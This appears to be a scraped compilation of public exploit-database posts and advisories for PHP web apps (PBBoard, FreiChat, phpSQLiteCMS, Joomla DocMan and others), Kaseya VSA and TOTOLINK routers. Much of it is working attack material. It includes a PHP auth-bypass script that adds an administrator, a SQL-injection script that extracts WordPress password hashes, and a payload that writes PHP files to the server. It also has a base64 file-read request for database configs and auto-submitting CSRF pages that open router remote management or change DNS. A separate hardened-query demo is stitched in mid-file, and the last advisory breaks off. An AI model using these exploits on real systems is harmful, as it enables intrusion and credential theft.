
source: https://www.securityfocus.com/bid/54862/info

PBBoard is a web-based messaging board application implemented in PHP.

Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.

PBBoard versions prior to 2.1.4 are vulnerable.
http://drupal.org/node/207891 

<?
/*
+ Application : Power Bulletin Board < 2.1.4
| Download : pbboard.com
| By Faris , AKA i-Hmx
| n0p1337@gmail.com
+ sec4ever.com , 1337s.cc

Time line :
 > 14/7/2012 , Vulnerability discovered
 > 30/7/2012 , Vendor Reported
 > 31/7/2012 , patch released
 > 01/8/2012 , Public disclosure
 

engine/engine.class.php
 		$this->_CONF['admin_username_cookie']	=	'PowerBB_admin_username';
 		$this->_CONF['admin_password_cookie']	=	'PowerBB_admin_password';
admin/common.module.php
		if (!empty($username)
			and !empty($password))
		{
			$CheckArr 				= 	array();
			$CheckArr['username'] 	= 	$username;
			$CheckArr['password'] 	= 	$password;

			$CheckMember = $PowerBB->member->CheckAdmin($CheckArr);

			if ($CheckMember != false)
			{
				$PowerBB->_CONF['rows']['member_row'] = 	$CheckMember;
				$PowerBB->_CONF['member_permission'] 	= 	true;
			}
			else
			{
				$PowerBB->_CONF['member_permission'] = false;
			}

		}
Function CheckAdmin is called from
engine/systyms/member.class.php
go deeper and deeper till u find the vulnerable query
this can be used to bypass login rules as cookies are not sanitized before being called for login confirmation
*/
echo "\n+-------------------------------------------+\n";
echo "|          PBulletin Board < 2.1.4          |\n";
echo "|    Auth Bypass vuln / Admin add Exploit   |\n";
echo "|                  By i-Hmx                 |\n";
echo "|             n0p1337@gmail.com             |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target # ";
function get($url,$post,$cookies){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,"http://".$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
//curl_setopt($curl, CURLOPT_REFERER, $reffer);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true); 
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
		$string = " ".$string;
		$ini = strpos($string,$start);
		if ($ini == 0) return "";
		$ini += strlen($start);
		$len = strpos($string,$end,$ini) - $ini;
		return substr($string,$ini,$len);
}
$vic=str_replace('http://','',trim(fgets(STDIN)));
if($vic==''){exit();}
$log=fopen('faris.txt','w+');
$ran=rand(10000,20000);
echo "| Adding New User\n";
$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
$myid=kastr($add,'main=1&id=','">');
if($myid==''){exit("| Exploitation Failed\n   - Magic_Quotes Maybe on or wrong path\n+ Exit");}
echo "| User Data :\n   + UserName : f4ris_$ran\n   + Password : sec4ever1337s\n   + User ID : $myid\n";
echo "| Updating User privileges\n";
$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
echo "+ Exploitatin Done ;)\n";
exit();
?>
            
source: https://www.securityfocus.com/bid/54861/info

TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Versions prior to TCExam 11.3.008 are vulnerable.

http://www.example.com/admin/code/tce_edit_question.php?subject_module_id
http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id
http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id
            
source: https://www.securityfocus.com/bid/54866/info

GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

GetSimple 3.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cms/admin/filebrowser.php?path=[LFI]
            
HireHackking

phpSQLiteCMS - Multiple Vulnerabilities

# Exploit Title: CSRF, Unrestricted File Upload, Privilege escalation & XSS
# Google Dork: intitle: CSRF, Unrestricted File Upload, Privilege escalation & XSS
# Date: 2015-07-12
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpsqlitecms.net
# Software Link: phpsqlitecms.net/download
# Version: ilosuna-phpsqlitecms-d9b8219
# Tested on: windows 7 SP1
# Category: Web apps CMS

Vendor:
================================
phpsqlitecms.net

Product:
================================
ilosuna-phpsqlitecms-d9b8219

Advisory Information:
==============================================================================
CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities.

Users are affected if they visit a malicious website or click an infected link, possibly resulting in attackers taking control of the Admin / CMS area.

Vulnerability Details:
=====================

CSRF:
-----
We can add arbitrary users to the system, delete arbitrary web server files and escalate privileges, as no CSRF token is present.

Add arbitrary user:
-------------------
The following request variables are all that is needed to add users to the system.

mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"

Privilege escalation:
---------------------
Under the users area in admin we can easily gain admin privileges: again using the CSRF vulnerability, we submit the form with our own id and change the request variable "type" to '1', granting us admin privileges.

e.g.

mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1   <------ make us admin

Delete arbitrary files:
------------------------
The following request parameters are all that is needed to delete files from the media or files directories under the web server's CMS area.

mode=filemanager
directory=files
delete=index.html
confirmed=true

XSS:
-----
We can steal the PHP session cookie via an XSS vulnerability.

Unrestricted File Type Upload:
------------------------------
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts, when selected, will execute whatever PHP script we upload.

Exploit code(s):
===============

1- CSRF POC: Add arbitrary users to the system.
---------------------------------------------

<script>
function doit(){
  var e=document.getElementById('evil')
  e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="evil" action="http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php" method="post">
<input type="text" name="mode" value="users"/>
<input type="text" name="new_user_submitted" value="true"/>
<input type="text" name="name" value="hyp3rlinx" />
<input type="text" name="pw" value="abc123" />
<input type="text" name="pw_r" value="abc123" />
</form>

2- CSRF privilege escalation POST URL:
--------------------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php

Privilege escalation request string:
------------------------------------
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1

3- CSRF Delete Arbitrary Server Files:
--------------------------------------
The request URL below will delete the index.html file in the files dir on the web server without any request validation (CSRF token etc.).

http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager&directory=files&delete=index.html&confirmed=true

XSS steal PHP session ID POC:
-----------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&edit=49&comment_id="/><script>alert('XSS by hyp3rlinx '%2bdocument.cookie)</script>&page=1

Disclosure Timeline:
=========================================================
Vendor Notification: NA
July 12, 2015 : Public Disclosure

Severity Level:
=========================================================
High

Description:
==========================================================
Request Method(s):
[+] POST & GET

Vulnerable Product:
[+] ilosuna-phpsqlitecms-d9b8219

Vulnerable Parameter(s):
[+] comment_id, delete, type, new_user_submitted

Affected Area(s):
[+] Admin & CMS

===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
HireHackking
source: https://www.securityfocus.com/bid/54881/info

ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected.

http://www.example.com/crm/Sales.do?nameFirst&nameLast
http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company
http://www.example.com/crm/Accounts.do?name
http://www.example.com/crm/MyCFSProfile.do?address1state
HireHackking

FreiChat 9.6 - SQL Injection

/*
# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

$_GET['time'] is not escaped.

File: freichat\server\plugins\chatroom\chatroom.php

$get_mesg = $this->get_messages($_GET['time']);

public function get_messages($time) {
    $frm_id = $this->frm_id;
    $result = array();
    if ($time == 0) {
        //$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
    } else {
        $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
        $result = $this->db->query($get_mesg_query)->fetchAll();
    }
    return $result;
}

http://security.szurek.pl/freichat-96-sql-injection.html

2. Proof of Concept

Example for WordPress integration (it will give you admin password):
*/
<?php
/*
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $cookie, $sql ){
    $ckfile = dirname(__FILE__) . $cookie;
    $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $content = curl_exec($ch);
    if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
        curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
        $content = curl_exec($ch);
        curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));
        $content = curl_exec($ch);
        if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
            echo "WordPress password user ID=1: ".$output[1];
        } else {
            echo "FAIL";
        }
    }
    curl_close( $ch );
}

// URL to WordPress main URL
$url = "http://wp/";
// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";
$cookie = "/cookie.txt";
hack($url, $cookie, $sql);
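As an added defender-side example (not FreiChat's code), the get_messages() pattern from chatroom.php is reproduced against an in-memory SQLite table next to a hardened version that validates $time as an integer and binds it through a prepared statement; the frei_chat and wp_users schemas are constructed for the demo, and the script assumes PHP with the pdo_sqlite extension.

```php
<?php
// Constructed demo schema: the real frei_chat table has more columns, which is
// why the advisory's payload pads the UNION with twelve values. Four are enough here.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE frei_chat ("to" INTEGER, time INTEGER, message_type INTEGER, message TEXT)');
    $db->exec('CREATE TABLE wp_users (ID INTEGER, user_pass TEXT)');
    $db->exec("INSERT INTO frei_chat VALUES (7, 5, 0, 'hello'), (7, 9, 1, 'system notice'), (8, 9, 0, 'other user')");
    $db->exec("INSERT INTO wp_users VALUES (1, 'constructed-hash-not-real')");   // constructed value
    return $db;
}

// Vulnerable shape, as in chatroom.php: $time is concatenated into the SQL text
// unquoted, so any non-numeric string becomes part of the statement.
function get_messages_vulnerable(PDO $db, int $frm_id, $time): array {
    if ($time == 0) {
        return array();
    }
    $sql = 'SELECT * FROM frei_chat WHERE frei_chat."to"=' . $frm_id
         . ' AND time>' . $time . ' AND message_type<>1 ORDER BY time';
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: reject anything that is not an integer up front, then bind both
// values as typed parameters so the driver never sees them as SQL.
function get_messages_hardened(PDO $db, int $frm_id, $time): array {
    $time = filter_var($time, FILTER_VALIDATE_INT);
    if ($time === false || $time === 0) {
        return array();   // "1 UNION SELECT ..." fails validation and is never interpolated
    }
    $stmt = $db->prepare('SELECT * FROM frei_chat WHERE frei_chat."to"=:frm AND time>:t AND message_type<>1 ORDER BY time');
    $stmt->bindValue(':frm', $frm_id, PDO::PARAM_INT);
    $stmt->bindValue(':t', $time, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();
// The advisory's payload, trimmed to the four-column demo table.
$payload = '1 UNION SELECT 1, 2, 3, user_pass FROM wp_users WHERE ID=1 -- ';

foreach (get_messages_vulnerable($db, 7, $payload) as $row) {
    // The wp_users row surfaces as a chat "message"; the trailing comment also
    // removed the message_type<>1 filter, so the type-1 row leaks too.
    echo "vulnerable: time={$row['time']} message={$row['message']}\n";
}

echo "hardened rows for the same payload: " . count(get_messages_hardened($db, 7, $payload)) . "\n";   // 0
echo "hardened rows for time=1:           " . count(get_messages_hardened($db, 7, '1')) . "\n";        // 1
```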
HireHackking

Arab Portal 3 - SQL Injection

## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1

The members.php?action=signup POST parameter "showemail" is vulnerable to an error-based SQLi attack.
................................................................................
1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady

video : https://youtu.be/5nFblYE90Vk

good luck
HireHackking

PBBoard - 'index.php' Multiple SQL Injections

source: https://www.securityfocus.com/bid/54916/info

PBBoard is prone to multiple security vulnerabilities including:

1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability

Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.

PBBoard 2.1.4 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">
<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">
<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">
<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">
<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">
<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="check[]" value="1">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="new_password" value="1">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=tags&start=1" method="post" name="main" id="main">
<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">
<input type="submit" name="Submit" value="Send">
</form>
HireHackking

PBBoard - 'member_id' Validation Password Manipulation

source: https://www.securityfocus.com/bid/54916/info

PBBoard is prone to multiple security vulnerabilities including:

1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability

Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.

PBBoard 2.1.4 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="new_password">
<input type="submit" name="Submit" value="Send">
</form>
HireHackking
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015

>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."

A special thanks to CERT and ZDI for assisting with the vulnerability reporting process. These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.

>> Technical details:

#1
Vulnerability: Arbitrary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.

This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).

#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
   Host: www.google.com
   (the Host header has to be spoofed to the target)

>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29

>> References:
[1] https://www.kb.cert.org/vuls/id/919604

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
HireHackking

Joomla! Component com_docman - Multiple Vulnerabilities

# Joomla docman Component 'com_docman' Full Path Disclosure (FPD) & Local File Disclosure/Include (LFD/LFI)
# CWE: CWE-200 (FPD) CWE-98 (LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD):

Get one target and just download with a blank parameter:

http://www.site.com/components/com_docman/dl2.php?archive=0&file=

The page title will contain the Full Path Disclosure of the server.

# Xploit (LFD/LFI):

http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]

Let's Xploit...

First we need to use the FPD Xploit to see the path of the target; after that we insert 'configuration.php' (the database configuration file) and encode it in Base64:

../../../../../../../target/www/configuration.php <= Not Ready

http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

And now we have a configuration file...
HireHackking
## Advisory Information

Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: Released, 0day
CVE: no current CVE

## Product Description

TOTOLINK is a brother brand of ipTime, which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers, wifi access points and network devices. Their products are sold worldwide.

## Vulnerability Summary

TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers. Their current firmwares with default configuration are vulnerable to CSRF attacks and XSS attacks.

Since the anti-CSRF protection is based on a static HTTP referer (RFC 1945), an attacker can take over most of the configuration and settings using anyone inside the LAN of the router.

Owners are urged to contact TOTOLINK, and activate authentication on this product (disabled by default).

It affects (firmwares come from totolink.net and from totolink.cn):

TOTOLINK iPuppy    : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update)
TOTOLINK iPuppy3   : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update)
TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN (TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update)
TOTOLINK N200RE    : firmware V1.4-B20140724-2-457-EN (TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update)

## Details - CSRF

The HTTP interface allows editing the configuration. This interface is vulnerable to CSRF. Configuration and settings can be modified with CSRF attacks:

  Activate the remote control management
  Change the DNS configuration
  Update the firmware
  Change the Wifi Configuration
  Create TCP redirections to the LAN
  and more...

Example of forms exploiting the CSRF:

o Activating the remote control management on port 31337/tcp listening on the WAN interface.

<html>
<head>
<script>
function s() {
  document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="SYS">
<input type="hidden" name="GO" value="firewallconf_accesslist.html">
<input type="hidden" name="nowait" value="1">
<input type="hidden" name="SET0" value="17367296=31337">
<input type="hidden" name="SET1" value="17236224=1">
</form>
</body>
</html>

o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1:

<html>
<head>
<script>
function s() {
  document.f.submit();
}
</script>
</head>
<body onload="s()">
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
<input type="hidden" name="CMD" value="WAN">
<input type="hidden" name="GO" value="netconf_wansetup.html">
<input type="hidden" name="SET0" value="50397440=2">
<input type="hidden" name="SET1" value="50856960=64-E5-99-AA-AA-AA">
<input type="hidden" name="SET2" value="235077888=1">
<input type="hidden" name="SET3" value="235012865=0.2.0.7">
<input type="hidden" name="SET4" value="235012866=1.2.0.1">
<input type="hidden" name="SET5" value="51118336=0">
<input type="hidden" name="SET6" value="51839232=1">
<input type="hidden" name="SET7" value="51511552=1500">
<input type="hidden" name="SET8" value="117834240=">
<input type="hidden" name="SET9" value="117703168=">
<input type="hidden" name="SET10" value="117637376=1492">
<input type="hidden" name="SET11" value="51446016=1500">
<input type="hidden" name="SET12" value="50463488=192.168.1.1">
<input type="hidden" name="SET13" value="50529024=255.255.255.0">
<input type="hidden" name="SET14" value="50594560=192.168.1.254">
</form>
</body>
</html>

The variable GO is an open redirect. Any URL like http://www.google.com/ for instance can be used.

The variable GO is also vulnerable to XSS. It's out of scope in this advisory.

To bypass the protection (which checks the referer), you can, for example, base64 the form and include it in the webpage. The referer will be empty and the CSRF will be accepted by the device:

o activate_admin_wan_csrf_bypass.html:

<html>
<head>
<meta http-equiv="Refresh" content="1;url=data:text/html;charset=utf8;base64,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">
</head>
<body>
</body>
</html>

Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate the remote management interface on port 31337/TCP.

You can test it through http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html

o change_dns_csrf_bypass.html:

<html>
<head>
<meta http-equiv="Refresh" content="1;url=data:text/html;charset=utf8;base64,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">
</head>
<body>
</body>
</html>

Visiting change_dns_csrf_bypass.html in a remote location will change the DNS servers provided by the TOTOLINK device in the LAN.

You can test it through http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html

## Details - stored XSS and fun

There is a stored XSS, which can be injected using UPNP from the LAN, without authentication:

upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping

Required argument:
        Argument Name:  NewPortMappingDescription
        Data Type:      string
        Allowed Values: []
        Set NewPortMappingDescription value to: <script>alert("XSS");</script>

Required argument:
        Argument Name:  NewLeaseDuration
        Data Type:      ui4
        Allowed Values: []
        Set NewLeaseDuration value to: 0

Required argument:
        Argument Name:  NewInternalClient
        Data Type:      string
        Allowed Values: []
        Set NewInternalClient value to: <script>alert("XSS");</script>

Required argument:
        Argument Name:  NewEnabled
        Data Type:      boolean
        Allowed Values: []
        Set NewEnabled value to: 1

Required argument:
        Argument Name:  NewExternalPort
        Data Type:      ui2
        Allowed Values: []
        Set NewExternalPort value to: 80

Required argument:
        Argument Name:  NewRemoteHost
        Data Type:      string
        Allowed Values: []
        Set NewRemoteHost value to: <script>alert("XSS");</script>

Required argument:
        Argument Name:  NewProtocol
        Data Type:      string
        Allowed Values: ['TCP', 'UDP']
        Set NewProtocol value to: TCP

Required argument:
        Argument Name:  NewInternalPort
        Data Type:      ui2
        Allowed Values: []
        Set NewInternalPort value to: 80

upnp>

The UPNP webpage in the administration area (http://192.168.0.1/popup_upnp_portmap.html) will show:

[...]
<tr>
<td class=item_td>TCP</td>
<td class=item_td>21331</td>
<td class=item_td><script>alert("XSS")<script>alert("XSS");</script>:28777</td>
<td class=item_td><script>alert("XSS");</script></td>
</tr>
[...]

From my research, there are some bits overlapping with others, resulting in funny ports being shown and input data being truncated. A remote DoS against the upnpd process seems to be easily done. Gaining Remote Code Execution by UPNP exploitation is again left as an exercise for the reader.

## Vendor Response

Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case.

## Report Timeline

* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking for similar ipTIME products.
* Jul 16, 2015: A public advisory is sent to security mailing lists.

## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).

## Greetings

Big thanks to Alexandre Torres.

## References

https://pierrekim.github.io/advisories/2015-totolink-0x01.txt

## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking
## Advisory Information

Title: Backdoor and RCE found in 8 TOTOLINK router models
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE

## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers, wifi access points and network devices. Their products are sold worldwide.

## Vulnerabilities Summary

A backdoor is present in several TOTOLINK products. This was confirmed by analysing the latest firmwares and by testing the backdoor against live routers.

At least 8 TOTOLINK products are affected (firmwares come from totolink.net and from totolink.cn):

- A850R-V1 : until last firmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
- F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
- F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
- N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
- N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
- N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
- N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
- N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web

